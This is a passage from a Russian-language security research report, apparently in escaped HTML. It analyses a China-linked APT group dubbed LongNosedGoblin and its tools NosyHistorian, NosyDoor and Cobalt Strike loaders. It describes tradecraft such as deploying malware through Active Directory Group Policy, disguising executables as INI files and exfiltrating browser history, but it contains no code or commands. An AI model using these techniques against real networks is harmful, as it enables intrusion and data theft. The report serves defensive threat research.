\u0432\u0438\u0434\u0435\u043e. \u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u0431\u044b\u043b \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d \u0432 \u043d\u0430\u0448\u0435\u0439 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0435\u0449\u0435 \u0432 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u0435 2023 \u0433\u043e\u0434\u0430.<\/p>\n<h3>\u0410\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u044f<\/h3>\n<p>\u0418\u0437-\u0437\u0430 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043d\u0430\u0431\u043e\u0440\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 \u0434\u043b\u044f \u0431\u043e\u043a\u043e\u0432\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f, \u043c\u044b \u0440\u0435\u0448\u0438\u043b\u0438 \u043e\u0442\u043d\u0435\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0438 \u043a \u043d\u043e\u0432\u043e\u0439 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u043e\u0439 \u0441 \u041a\u0438\u0442\u0430\u0435\u043c APT-\u0433\u0440\u0443\u043f\u043f\u0435 \u0438 \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u0435\u0435 LongNosedGoblin. \u041c\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u0435 \u0432 \u043f\u0443\u0442\u044f\u0445 \u043a \u0444\u0430\u0439\u043b\u0430\u043c, \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0445 \u0432 <a href=\"https:\/\/securelist.com\/toddycat-traffic-tunneling-data-extraction-tools\/112443\/\">\u043f\u043e\u0441\u0442\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 Kaspersky \u043e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 ToddyCat<\/a>, APT-\u0433\u0440\u0443\u043f\u043f\u044b \u0441 \u043f\u043e\u0445\u043e\u0436\u0438\u043c <a href=\"https:\/\/securelist.com\/toddycat\/106799\/\">\u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433\u043e\u043c<\/a>, \u043d\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0432 \u0442\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435 \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u0430 \u043a\u043e\u0434\u0430 \u0441 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u043c \u0437\u0434\u0435\u0441\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e.<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0432 \u0438\u044e\u043d\u0435 2025 \u0433\u043e\u0434\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Solar \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 <a href=\"https:\/\/web.archive.org\/web\/20250803114940\/https:\/rt-solar.ru\/solar-4rays\/blog\/5603\/\">\u043f\u043e\u0441\u0442 \u0432 \u0431\u043b\u043e\u0433\u0435<\/a> \u043e\u0431 APT-\u0433\u0440\u0443\u043f\u043f\u0435, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043e\u043d\u0430 \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u0442 Erudite Mogwai, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u043e\u0447\u0435\u043d\u044c \u043f\u043e\u0445\u043e\u0436\u0443\u044e \u043d\u0430 NosyDoor \u043e\u0442 LongNosedGoblin. \u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0430\u0432\u0442\u043e\u0440\u043e\u0432, Erudite Mogwai \u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u043d\u0430 \u0418\u0422-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u0418\u0422-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0432 \u0441\u0432\u043e\u0438\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u0445 \u0431\u044d\u043a\u0434\u043e\u0440 LuckyStrike Agent.<\/p>\n<p>\u041e\u0434\u043d\u0430\u043a\u043e \u043c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0442\u044c, \u0447\u0442\u043e Erudite Mogwai \u0438 LongNosedGoblin \u2014 \u044d\u0442\u043e \u043e\u0434\u043d\u043e \u0438 \u0442\u043e \u0436\u0435, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043c\u0435\u0436\u0434\u0443 \u0434\u0432\u0443\u043c\u044f \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u0430\u044f \u0440\u0430\u0437\u043d\u0438\u0446\u0430 \u0432 TTP. \u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Erudite Mogwai \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u043e\u0439 Active Directory \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u2014 \u0442\u0435\u0445\u043d\u0438\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u0430 \u0434\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 LongNosedGoblin.<\/p>\n<p>\u041f\u043e\u0437\u0436\u0435 \u043c\u044b \u0432\u044b\u044f\u0432\u0438\u043b\u0438 \u0435\u0449\u0435 \u043e\u0434\u0438\u043d \u0432\u0430\u0440\u0438\u0430\u043d\u0442 NosyDoor, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044e \u0432 \u0441\u0442\u0440\u0430\u043d\u0435 \u0415\u0421, \u0441\u043d\u043e\u0432\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 TTP \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441 Yandex Disk \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 C&amp;C. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u044d\u0442\u043e\u0433\u043e \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430 NosyDoor \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u043c\u0438 \u0441 \u041a\u0438\u0442\u0430\u0435\u043c \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438 \u0443\u0433\u0440\u043e\u0437. \u042d\u0442\u043e \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442\u0441\u044f \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u0435\u043c Solar \u0441\u043b\u043e\u0432\u0430 <span>Paid<\/span> \u0432 \u043f\u0443\u0442\u0438 PDB NosyDoor, \u0447\u0442\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u0441\u043b\u0443\u0433\u0438 \u2014 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043e\u043d\u043e \u043f\u0440\u043e\u0434\u0430\u0435\u0442\u0441\u044f \u0438\u043b\u0438 \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0434\u0440\u0443\u0433\u0438\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c.<\/p>\n<h3>\u041f\u043e\u0437\u0434\u043d\u0438\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438<\/h3>\n<p>\u041d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 2024 \u0433\u043e\u0434\u0430 LongNosedGoblin \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043b\u0430 NosyDownloader \u0432 \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438. \u0412 \u0434\u0435\u043a\u0430\u0431\u0440\u0435 \u0442\u043e\u0433\u043e \u0436\u0435 \u0433\u043e\u0434\u0430 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e NosyHistorian \u0432 \u042f\u043f\u043e\u043d\u0438\u0438, \u043d\u043e \u0437\u0430\u0442\u0435\u043c \u043d\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438.<\/p>\n<p>\u0412 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u0435 2025 \u0433\u043e\u0434\u0430 \u043c\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u044c \u0432\u043e\u0437\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u044b \u0432 \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438. \u041a\u0430\u043a \u0438 \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 NosyHistorian \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b.<\/p>\n<p>\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u044d\u0442\u043e\u0439 \u0432\u043e\u043b\u043d\u044b \u0430\u0442\u0430\u043a \u043c\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435, \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e <a href=\"https:\/\/attack.mitre.org\/software\/S0154\/\">Cobalt Strike<\/a>: \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <span>oci.dll<\/span> \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u043d\u0430 \u043e\u0434\u043d\u0443 \u043c\u0430\u0448\u0438\u043d\u0443, \u0430 \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <span>ocapi.edb<\/span> \u0431\u044b\u043b\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u0430 \u0441 \u0434\u0438\u0441\u043a\u0430. \u0417\u0430\u0442\u0435\u043c LongNosedGoblin \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u043b\u0430 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a Cobalt Strike \u043d\u0430 \u0432\u044b\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b \u0447\u0435\u0440\u0435\u0437 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443.<\/p>\n<p>\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043c\u044b \u0432\u0438\u0434\u0435\u043b\u0438, \u0447\u0442\u043e \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0434\u0440\u0443\u0433\u043e\u0439 \u043f\u043e\u0445\u043e\u0436\u0438\u0439 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, <span>mscorsvc.dll<\/span>, \u0441 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439, \u0445\u0440\u0430\u043d\u044f\u0449\u0435\u0439\u0441\u044f \u0432 <span>conf.ini<\/span>. \u042d\u0442\u043e\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0437\u0430\u0442\u0435\u043c \u0431\u044b\u043b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0436\u0435\u0440\u0442\u0432 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438, \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044f \u0442\u043e\u0442 \u0436\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438, \u0447\u0442\u043e \u0438 <span>oci.dll<\/span>.<\/p>\n<h2>\u041d\u043e\u0441\u0438\u043c\u0441\u044f \u0432\u043e\u043a\u0440\u0443\u0433: \u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 LongNosedGoblin<\/h2>\n<h3>NosyHistorian<\/h3>\n<p>NosyHistorian \u2014 \u044d\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 C#\/.NET \u0441 \u0441\u0430\u043c\u043e\u043e\u0431\u044a\u044f\u0441\u043d\u044f\u044e\u0449\u0438\u043c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <span>GetBrowserHistory<\/span>, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u0442 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430. \u0412 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u044d\u0442\u043e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0432 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435. \u041e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f\u0441\u044c \u043d\u0430 \u044d\u0442\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043e\u043d\u0438 \u0432\u044b\u0431\u0438\u0440\u0430\u043b\u0438 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u044b\u0445 \u0436\u0435\u0440\u0442\u0432 \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0439 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0432\u043e\u0435\u0433\u043e \u0431\u044d\u043a\u0434\u043e\u0440\u0430 NosyDoor.<\/p>\n<p>\u041c\u044b \u0432\u0438\u0434\u0435\u043b\u0438, \u043a\u0430\u043a \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043b\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u043e\u0434 \u0438\u043c\u0435\u043d\u0435\u043c \u0444\u0430\u0439\u043b\u0430 <span>History.ini<\/span>, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f \u0444\u0430\u0439\u043b \u043f\u043e\u0434 INI-\u0444\u0430\u0439\u043b. \u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435, \u044d\u0442\u043e \u043f\u0435\u0440\u0435\u043d\u043e\u0441\u0438\u043c\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b (PE), \u0446\u0435\u043b\u044c \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e, \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u2014 \u0441\u043b\u0438\u0442\u044c\u0441\u044f \u0441 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 INI-\u0444\u0430\u0439\u043b\u0430\u043c\u0438, <a href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/windows\/it-pro\/windows-server-2012-r2-and-2012\/dn789188(v=ws.11)#ini-files-extension\">\u043e\u0431\u044b\u0447\u043d\u043e<\/a> \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u043c\u0438\u0441\u044f \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 \u043a\u044d\u0448\u0430 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438.<\/p>\n<p>NosyHistorian \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0435\u0442 \u0432\u0441\u0435\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u0438 \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0438\u0437 Google Chrome, Microsoft Edge \u0438 Mozilla Firefox. \u041a\u0430\u0436\u0434\u044b\u0439 \u0444\u0430\u0439\u043b \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433, \u0430 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0439 \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u044b\u0439 SMB-\u0440\u0435\u0441\u0443\u0440\u0441 \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \u0418\u043c\u044f \u0444\u0430\u0439\u043b\u0430 NosyHistorian \u0434\u043b\u044f \u0444\u0430\u0439\u043b\u0430 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0443\u043a\u0430\u0437\u0430\u043d\u043e \u0432 \u0422\u0430\u0431\u043b\u0438\u0446\u0435 1, \u0433\u0434\u0435 <span>&lt;profile_name&gt;<\/span> \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u0440\u043e\u0444\u0438\u043b\u044f\u043c \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432.<\/p>\n<p><em>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 1. \u0418\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u0441\u0442\u043e\u0440\u0438\u0438, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 NosyHistorian<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"132\"><strong>\u0412\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440<\/strong><\/td>\n<td width=\"511\"><strong>\u0418\u043c\u044f \u0444\u0430\u0439\u043b\u0430<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"132\">Google Chrome<\/td>\n<td width=\"511\"><span>&lt;username&gt;_&lt;machine_name&gt;_&lt;profile_name&gt;_History<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"132\">Microsoft Edge<\/td>\n<td width=\"511\"><span>&lt;username&gt;_&lt;machine_name&gt;_edge_History<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"132\">Mozilla Firefox<\/td>\n<td width=\"511\"><span>&lt;username&gt;_&lt;machine_name&gt;_firefox_&lt;profile_name&gt;_places.sqlite<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u0418 \u044d\u0442\u043e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442, \u0438 NosyDoor \u0438\u043c\u0435\u044e\u0442 \u0441\u0445\u043e\u0436\u0438\u0435 \u043f\u0443\u0442\u0438 PDB \u0438 \u0431\u044b\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0438\u0437 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 <span>E:Csharp<\/span>, \u043f\u0440\u0438\u0447\u0435\u043c \u043f\u0443\u0442\u044c PDB NosyHistorian: <span>E:CsharpSharpMiscGetBrowserHistoryobjDebugGetBrowserHistory.pdb<\/span>.<\/p>\n<h3>NosyDoor<\/h3>\n<p>\u041a\u0430\u043a \u0443\u0436\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u043e\u0441\u044c, \u0431\u044d\u043a\u0434\u043e\u0440 NosyDoor \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a Microsoft OneDrive, \u0434\u043b\u044f \u0441\u0432\u043e\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 C&amp;C. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0438\u043c\u0435\u0435\u0442 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u0443\u044e \u0442\u0440\u0435\u0445\u044d\u0442\u0430\u043f\u043d\u0443\u044e \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, 